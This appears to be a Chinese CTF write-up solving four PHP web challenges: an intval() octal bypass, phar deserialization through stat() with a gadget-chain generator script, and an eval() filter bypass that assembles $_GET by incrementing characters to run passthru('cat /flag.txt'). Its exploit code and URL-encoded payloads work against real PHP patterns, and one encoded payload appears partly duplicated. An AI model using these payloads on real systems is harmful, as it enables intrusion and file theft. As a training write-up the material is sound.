文章目录
热身
include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num, "0")){ die("no no no!!!"); } if(intval($num,0)===4476){ echo $flag; }}查官方文档
intval() 函数用于获取变量的整数值。intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。PHP 4, PHP 5, PHP 7语法int intval ( mixed $var [, int $base = 10 ] )参数说明:$var:要转换成 integer 的数量值。$base:转化所使用的进制。如果 base 是 0,通过检测 var 的格式来决定使用的进制:如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,如果字符串以 "0" 开始,使用 8 进制(octal);否则,将使用 10 进制 (decimal)。?num=+010574
ATTup
查看前端源码查到php文件
upload.php find.php任意文件读取漏洞,读取find.php
<!--class View { public $fn; public function __invoke(){ $text = base64_encode(file_get_contents($this->fn)); echo ""; }}class Fun{ public $fun = ":)"; public function __toString(){ $fuc = $this->fun; $fuc(); return ""; } public function __destruct() { echo ""; }}$filename = $_POST["file"];$stat = @stat($filename);-->代码审计
stat
stat(PHP 4, PHP 5, PHP 7, PHP 8)stat — 给出文件的信息这里可以触发phar反序列化phar反序列化
class View { public $fn; public function __invoke(){// $text = base64_encode(file_get_contents($this->fn));// echo ""; }}class Fun{ public $fun = ":)"; public function __toString(){ $fuc = $this->fun; $fuc(); return "1";// return ""; } public function __destruct() {// echo ""; }}$a=new Fun();$a->fun=new Fun();$a->fun->fun=new View();$a->fun->fun->fn="/flag";@unlink("phar.phar");$phar = new Phar("c2.phar");$phar->startBuffering();$phar->setStub('GIF89a'.' __HALT_COMPILER();'); //设置stub$phar->setMetadata($a); //将自定义meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();直接修改后缀为tar
$phar->setStub这行的内容不能出现与php,否则会提示内容非法stub的基本结构:
,stub必须以__HALT_COMPILER();`来作为结束部分,否则Phar拓展将不会识别该文件。
然后以phar://c2.tar协议访问即可
alert('Y3Rmc2hvd3szOWFmNDIzMi04MTQ2LTRiMzQtOGUwZS1lYmFiMGExZjY5N2R9Cg==');解码得到flagshellme
直接搜索flag得到flag,非预期解?
shellme_Revenge
尝试搜索ctfhsow,flag,ctf,hint等关键词,查看cookie等信息
Set-Cookiehint=%3Flooklook; expires=Sat, 20-May-2023 04:56:12 GMT; Max-Age=3600PHP Version 7.2.34?looklook=1<?phperror_reporting(0);if ($_GET['looklook']){ highlight_file(__FILE__);}else{ setcookie("hint", "?looklook", time()+3600);}if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf_show']; if (is_string($ctfshow) || strlen($ctfshow) <= 107) { if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){ eval($ctfshow); }else{ echo("fucccc hacker!!"); } }} else { phpinfo();}?>生成ascii对应可见字符
with open("ascii.txt","w") as f: for i in range(31,128): f.writelines(chr(i)+"\n")查看通过正则的内容
$myfile = fopen("ascii.txt", "r") or die("Unable to open file!");while (!feof($myfile)) { $ctfshow=fgets($myfile); if (is_string($ctfshow) || strlen($ctfshow) <= 107) { if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/", $ctfshow)) { echo "$ctfshow"; } }}fclose($myfile);第一行是空格
$()+,-./0123;<=?C[]_{}这里尝试通过++和c构造任意字符执行命令
在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为
Array
$_=C;$_++; //D$C=++$_; //E$_++; //F$C_=++$_; //G$_=(C/C.C)[0]; //N$_++; //O$_++; //P$_++; //Q$_++; //R$_++; //S$_=_.$C_.$C.++$_; //_GET$$_[1]($$_[2]); //$_GET[1]($_GET[2])?> ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]);ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b?1=passthru&2=cat /flag.txtctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b来源地址:https://blog.csdn.net/qq_63701832/article/details/130780534
